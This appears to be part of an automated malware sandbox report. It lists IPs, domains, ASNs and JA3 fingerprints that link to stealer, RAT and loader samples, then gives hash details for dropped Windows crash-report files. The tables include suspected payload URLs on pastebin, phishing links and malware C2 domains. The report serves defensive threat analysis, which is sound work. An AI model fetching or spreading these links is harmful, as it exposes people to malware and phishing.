104.20.3.235	cr_asm3.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	gabe.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_atCAD.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	5UIy3bo46y.dll	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	Lm9IJ4r9oO.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	BeginSync lnk.lnk	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	sostener.vbs	Get hash	malicious	Njrat	Browse	pastebin.com/raw/V9y5Q5vv
149.154.167.220	file.exe	Get hash	malicious	Unknown	Browse
	sosoliso.exe	Get hash	malicious	MassLogger RAT	Browse
	file.exe	Get hash	malicious	Amadey, XWorm	Browse
	file.exe	Get hash	malicious	XWorm	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse
	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse
34.117.59.81	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	VertusinstruccionesFedEX_66521.zip	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	UjbjOP.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	I9xuKI2p2B.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	licarisan_api.exe	Get hash	malicious	Icarus	Browse	ipinfo.io/ip
	build.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	YjcgpfVBcm.bat	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	lePDF.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	6Mpsoq1.php.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	y.bat	Get hash	malicious	Braodo	Browse	34.117.59.81
	https://fxwf9-53194.portmap.io:53194/?x=sb232111	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://trimmer.to:443/GWHMY	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
	bose18mkt.bat	Get hash	malicious	Abobus Obfuscator	Browse	34.117.59.81
	hnbose1711.bat	Get hash	malicious	Abobus Obfuscator	Browse	34.117.59.81
	LzmJLVB41K.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.59.81
	2h2xLB9h1L.lnk	Get hash	malicious	Abobus Obfuscator	Browse	34.117.59.81
	bose2scut18.bat	Get hash	malicious	Abobus Obfuscator	Browse	34.117.59.81
	18cut04.bat	Get hash	malicious	Abobus Obfuscator	Browse	34.117.59.81
	bose1511mkt.bat	Get hash	malicious	Abobus Obfuscator	Browse	34.117.59.81
revirepart.biz	b.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.43.198
	injector V2.5.exe	Get hash	malicious	LummaC	Browse	104.21.43.198
	hmjsOnyfSB.dll	Get hash	malicious	LummaC	Browse	172.67.184.174
	modest-menu.exe	Get hash	malicious	LummaC	Browse	172.67.184.174
	gdi32.dll	Get hash	malicious	LummaC	Browse	104.21.43.198
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.43.198
	c2_Acid.exe	Get hash	malicious	LummaC	Browse	172.67.184.174
	XRuncher_2.5.0.6.exe	Get hash	malicious	LummaC	Browse	172.67.184.174
	Jorieh.exe	Get hash	malicious	LummaC	Browse	172.67.184.174
api.telegram.org	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	sosoliso.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	file.exe	Get hash	malicious	Amadey, XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Updated Invoice_0755404645-2024_pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
frogs-severz.sbs	b.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.88.250
frogs-severz.sbs	file.exe	Get hash	malicious	LummaC Stealer	Browse	193.143.1.19

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	sosoliso.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	file.exe	Get hash	malicious	Amadey, XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	bZPAo2e2Pv.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.67.179
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.20.178
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	b.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.88.250
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	loader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.44.93
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	34.116.198.130
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	34.116.198.130
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	34.116.198.130
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
LINODE-APLinodeLLCUS	https://app.typeset.com/play/G4WZ1	Get hash	malicious	HTMLPhisher	Browse	45.33.60.162
	https://www.plushtoysmfg.com/plush-keychain-factory/	Get hash	malicious	Anonymous Proxy	Browse	45.33.3.184
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	172.105.84.134
	boatnet.x86.elf	Get hash	malicious	Unknown	Browse	104.237.135.249
	boatnet.mpsl.elf	Get hash	malicious	Unknown	Browse	104.237.135.234
	boatnet.ppc.elf	Get hash	malicious	Unknown	Browse	172.104.165.127
	https://hopp.bio/wchn	Get hash	malicious	HTMLPhisher	Browse	173.230.149.18
	fM7fKHA1rf.exe	Get hash	malicious	XenoRAT	Browse	96.126.118.61
	exe009.exe	Get hash	malicious	Emotet	Browse	103.3.63.137
	QWJfaEAROV.exe	Get hash	malicious	AsyncRAT	Browse	139.162.100.28

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Setup.exe	Get hash	malicious	LummaC	Browse	104.20.3.235 149.154.167.220 34.117.59.81
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.20.3.235 149.154.167.220 34.117.59.81
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.20.3.235 149.154.167.220 34.117.59.81
	17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe	Get hash	malicious	XWorm	Browse	104.20.3.235 149.154.167.220 34.117.59.81
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.20.3.235 149.154.167.220 34.117.59.81
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.20.3.235 149.154.167.220 34.117.59.81
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.20.3.235 149.154.167.220 34.117.59.81
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.20.3.235 149.154.167.220 34.117.59.81
	es.hta	Get hash	malicious	Unknown	Browse	104.20.3.235 149.154.167.220 34.117.59.81
	https://identitys.fraudguard.es/SSA_Updated_Statement	Get hash	malicious	ScreenConnect Tool	Browse	104.20.3.235 149.154.167.220 34.117.59.81
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Unknown	Browse	172.67.184.174 104.21.88.250
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.184.174 104.21.88.250
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.184.174 104.21.88.250
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	172.67.184.174 104.21.88.250
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.184.174 104.21.88.250
	file.exe	Get hash	malicious	Unknown	Browse	172.67.184.174 104.21.88.250
	b.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.184.174 104.21.88.250
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.184.174 104.21.88.250
	loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.184.174 104.21.88.250
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.184.174 104.21.88.250

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\gdi32.dll	b.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mxtvcgq32fe.exe_2711dd6c6a3b59b8793a33de2e9dd423a0e18fda_3fac82b3_3bc73dfe-16ee-4cd7-86e6-7d6e4a7cc3f2\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9754324830836212
Encrypted:	false
SSDEEP:	192:yCd1lb/lzl9c6l9K0BU/rl8lLaWpFzuiFDZ24IO8llz:yCHp/ZHc6hBU/rWZaizuiFDY4IO8lZ
MD5:	2AD9A15A4F833F3D4B4948CEBBBA2BC4
SHA1:	5A26C963FC4B5391D8CD8DF8FA2C44B03085DC23
SHA-256:	1CE1EA76E02D0B51AB8861992A6A014134255EE67744A74D235A8EFC0A2D6FA7
SHA-512:	A2FEF6872DA8184955A5F4739B71B90D7C433B2D3ED7D77DA77BC212E46827535098D8365CF5BC55C7608E0EA58F5C5D598007CE554268C8AACC9DCE54005703
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.3.6.0.4.5.2.9.2.8.3.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.3.6.0.4.5.7.1.4.7.0.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.c.7.3.d.f.e.-.1.6.e.e.-.4.c.d.7.-.8.6.e.6.-.7.d.6.e.4.a.7.c.c.3.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.d.4.8.0.a.7.-.6.a.b.4.-.4.2.b.0.-.8.7.6.9.-.1.a.2.f.5.7.8.3.a.b.b.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.x.t.v.c.g.q.3.2.f.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.u.b.y.L.i.a.m.V.i.o.l.e.t...z.Y.O.f.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.0.0.-.0.0.0.1.-.0.0.1.4.-.0.b.9.7.-.a.d.7.6.9.d.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.c.a.e.a.a.9.d.7.5.a.f.4.5.5.5.e.c.c.6.3.6.7.d.d.3.2.c.d.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zbjnkzvo4cc.exe_91fe3a34c9bbb1a5c2a345995be1177710a47ccf_18147d42_94eee511-b823-4a99-9fbc-9de814976ec1\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9858964109227577
Encrypted:	false
SSDEEP:	192:yunifycT1nKkd0BU/CaGpezuiFDZ24IO8bl:yuiacT1nDeBU/CahzuiFDY4IO8b
MD5:	87E3303FEF09FA4A64FF2AD3CAE13D80
SHA1:	2AAD730CC2F49013C627897C31A005C1D013E140
SHA-256:	6685790E152E6A59E786868BD6CBA50ECA16BDCF849F0B58499864F65D9FF791
SHA-512:	9793EE8954F343F15B23447AFAE66432DEE09CB861638D26B096BEC38211FBCAFCD9AA7772EFD5209F77E7E9237692AA7D302B18AFD5B3E6C6874B36FE819C00
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.3.6.0.4.3.2.4.7.5.5.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.3.6.0.4.3.9.8.1.9.1.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.e.e.e.5.1.1.-.b.8.2.3.-.4.a.9.9.-.9.f.b.c.-.9.d.e.8.1.4.9.7.6.e.c.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.f.d.5.5.7.6.-.d.0.a.a.-.4.3.6.4.-.b.0.1.1.-.6.6.8.2.9.6.5.8.7.6.3.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.b.j.n.k.z.v.o.4.c.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.u.b.y.L.i.a.m.V.i.o.l.e.t...z.Y.O.f.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.4.c.-.0.0.0.1.-.0.0.1.4.-.e.e.8.7.-.0.1.7.5.9.d.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.c.a.e.a.a.9.d.7.5.a.f.4.5.5.5.e.c.c.6.3.6.7.d.d.3.2.c.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9937.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Nov 23 11:47:23 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	198734
Entropy (8bit):	3.3252500745580025
Encrypted:	false
SSDEEP:	1536:iEMKsGdM0gfqNquj9pN4uE2aOufuqLTgCp1MfAcDCDfP4m:itZ/fqNqujx4uEqxqLTg+W2I
MD5:	8132F621FE49FE315DD339A918CD9226
SHA1:	93E49C2C4E2BB2F35A9A942C3BBA83D96A3BE3AA
SHA-256:	D9551F8723424AF083B5E45C7EDAD161BC6791FEFAA548EF8864FCCD627740FD
SHA-512:	B230DCA6ED69ECD70DA4458DF1673B7513A769C65F0A03317BEE55EA2191EEE933711D56CCC3DBF6AEDA11B28406CBC4ACFA87D7C62C50C30D28A26A8AFD86F4
Malicious:	false
Preview:	MDMP..a..... .........Ag............D...............X.......$................J..........`.......8...........T............0..............,............ ..............................................................................eJ....... ......GenuineIntel............T.......L.....Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9ADE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8410
Entropy (8bit):	3.704347591006382
Encrypted:	false
SSDEEP:	192:R6l7wVeJ6T65JZe6Yle6sWgmfZKYiprt89b9lsfLmfm:R6lXJO6A6YM6sWgmfgYd9+fLf
MD5:	AA1134CD956E18B4A6778921BA5AC785
SHA1:	1F8A00AAD6908190318050D42F75D962D8213F4F
SHA-256:	915AAC8A660A66DBEBFF575FED4047CC16B29D5726299CC7793678CC8216385E
SHA-512:	CE57C497FC9D13BC8E34FD0E72A002212C316704FFB241ED1852D243821E98E70AF489FC3AD1734C5616DB85C2F540B208B03235700385BB3FE85E42E66C9002
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B0E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4787
Entropy (8bit):	4.530851756835796
Encrypted:	false
SSDEEP:	48:cvIwWl8zsDJg77aI9t6WpW8VYeYm8M4Jx2FLH+q8v/9ZyN7ZH2Gd:uIjfdI7r77VKJCK1Z+H2Gd
MD5:	936F0D70B31862BB4B4B17B082488BC9
SHA1:	CEE67F0856055841EB42632C87EB978CD28BB362
SHA-256:	22FAFBED849F1399BFB94A25A94B348FA504975E038EDBD79CFB0872B3FEE837
SHA-512:	BE72C161A23B5885E77609226762F0CF4732206076D8A1865F1FF57FF4795D5B91928E63F9F4D98CFAD0C8CE41C62FE381D5B19F7D2EC109BDFF512CD6D8B151
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600650" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA136.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Nov 23 11:47:25 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	191975
Entropy (8bit):	3.2752399287933547
Encrypted:	false
SSDEEP:	1536:YlTJJzrxGpN4uE2aOSLgNxShiLTgw0KR88SCD5Iq9TO+UNU:MLlQ4uEq37bLTgwzegLdO+
MD5:	B509FF4AAB8A3C654C1C7E8A37B73B84
SHA1:	4D6C484126564494E7007C2D215F5E7365CCCCC1
SHA-256:	95D4CB82A6D1273011C5188C00C2F26CE0CC0A048ECBE79B15AC3EA0B46B8DD4
SHA-512:	494FF1F6F3D5119EFF91FC2B4A2D8A0AFDE1BC9230ABB00F56C760400D19975B5544CA9C42E8C435C7B387DE04675E4D1AF78F4FD9F94AB6588FC7212239343D
Malicious:	false
Preview:	MDMP..a..... .........Ag............D...........l...X.......$...........D...^I..........`.......8...........T............/../.......................................................................................................eJ......l.......GenuineIntel............T.............Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA221.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8396
Entropy (8bit):	3.692543800521999
Encrypted:	false
SSDEEP:	192:R6l7wVeJvlwM62216YTM6TgmfZtlviprM89bLhsf55m:R6lXJvZ6N6Y46TgmfztOLaf2
MD5:	88608F2EB4EECE27A6564C36F0AED49E
SHA1:	D0C09C9CD5AB23F9024F8FC63E6A4E18FFD9F4DB
SHA-256:	8346C25197CA519F80DC9C0A1BC1F4C2B56C88B8A326E9E737DB3F88CB3D35C4
SHA-512:	CEB60BB69FE081A8A9ED0D3EF5BA890C70E6129B3D6569E3EB2FD8D9CF7CB38354FC11B8335065E9D32C1F864976A03D1F507F2B88053D0A036045FA05BB25F4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA241.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4775
Entropy (8bit):	4.470307137645526
Encrypted:	false
SSDEEP:	48:cvIwWl8zsDJg77aI9t6WpW8VYxYm8M4JTDpDuFe+q8vxpDzyN7NHPHPd:uIjfdI7r77VBJTDDKxh2HPHPd
MD5:	6557F405291114509F8461D58A5CA554
SHA1:	D0A1DB78D014C9C1AFD87ECED992D72EAE4B258E
SHA-256:	4D083FCC4CFDFF856805C2F313953763B2E8A12BD0BDDDBE0BD855ECB129DBE7
SHA-512:	BB66ACC9345C11ABCD5B2E73E178D96E75F82974D51E74BCE2EB6C8646A9C62968066C6218A4D4C4F78EB85DFD649D08AE9C4B9B885B468A07B8C21F952A3372
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600650" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
